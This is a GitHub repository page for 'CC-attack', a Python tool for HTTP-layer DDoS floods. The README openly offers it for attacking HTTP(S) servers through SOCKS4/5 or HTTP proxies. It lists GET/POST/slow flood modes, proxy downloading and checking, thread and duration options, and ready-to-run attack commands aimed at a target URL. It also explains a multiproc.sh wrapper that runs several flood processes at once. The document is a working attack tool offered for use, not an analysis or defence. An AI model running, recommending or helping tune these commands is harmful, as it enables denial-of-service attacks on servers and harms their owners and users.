Skip to content

Leeon123/CC-attack

master
Switch branches/tags

Name already in use

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
Code

Files

Permalink
Failed to load latest commit information.
Type
Name
Latest commit message
Commit time
May 10, 2020 16:30
April 16, 2022 10:57
August 29, 2022 05:27
March 22, 2022 20:10
   /////    /////    /////////////
  CCCCC/   CCCCC/   | CC-attack |/
 CC/      CC/       |-----------|/ 
 CC/      CC/       |  Layer 7  |/ 
 CC/////  CC/////   | ddos tool |/ 
  CCCCC/   CCCCC/   |___________|/

CC-attack

A script for using socks4/5 or http proxies to attack http(s) server.

News:

  • Added Support of HTTP proxies
  • Added More proxies api to download

Info:

  • Using Python3
  • Added more human-like options
  • Http Get/Head/Post/Slow Flood
  • Random Http Header/Data
  • Socks4/5 Proxies Downloader
  • Socks4/5 Proxies Checker
  • Customize Cookies
  • Customize Post Data
  • Support HTTPS
  • Support Socks4/5

Showcase

Using multiproc.sh with socks4 on a vps

Install

pip3 install requests pysocks
git clone https://github.com/Leeon123/CC-attack.git
cd CC-attack

Usage

python3 cc.py <arguments>
===============  CC-attack help list  ===============
   -h/help   | showing this message
   -url      | set target url
   -m/mode   | set program mode
   -data     | set post data path (only works on post mode)
             | (Example: -data data.json)
   -cookies  | set cookies (Example: 'id:xxx;ua:xxx')
   -v        | set proxy type (4/5/http, default:5)
   -t        | set threads number (default:800)
   -f        | set proxies file (default:proxy.txt)
   -b        | enable/disable brute mode
             | Enable=1 Disable=0  (default:0)
   -s        | set attack time(default:60)
   -down     | download proxies
   -check    | check proxies
=====================================================

Some example of the usage

Download socks5 proxies as proxy.txt:

python3 cc.py -down -f proxy.txt -v 5

Attack a target with custom proxies list(socks4.txt) for 30 seconds :

python3 cc.py -url http://target.com -f socks4.txt -v 4 -s 30

Usage of multiproc.sh

This script is using for increasing the performance of cc.py.
Due to the suck performance of python since it has a GIL lock,
And I am lazy to make a multiprocess version.
There is a option for linux user to increase their performance of cc.py

This script basicly just run cc.py multiple times to make it "multi-processing"

First, put this script and cc.py in the same folder.

Then prepare the proxies list by yourself or just run "python3 cc.py -down -v 4" (-v socks version)

After that, change the number of process.

At last, change atk_cmd to your command and run the script by "bash multiproc.sh"

Example setup of multiproc.sh (-v socks version) (-s attack time)

atk_cmd="python3 cc.py -url http://target.com -v 4 -s 60"

#number of process that you want
process=10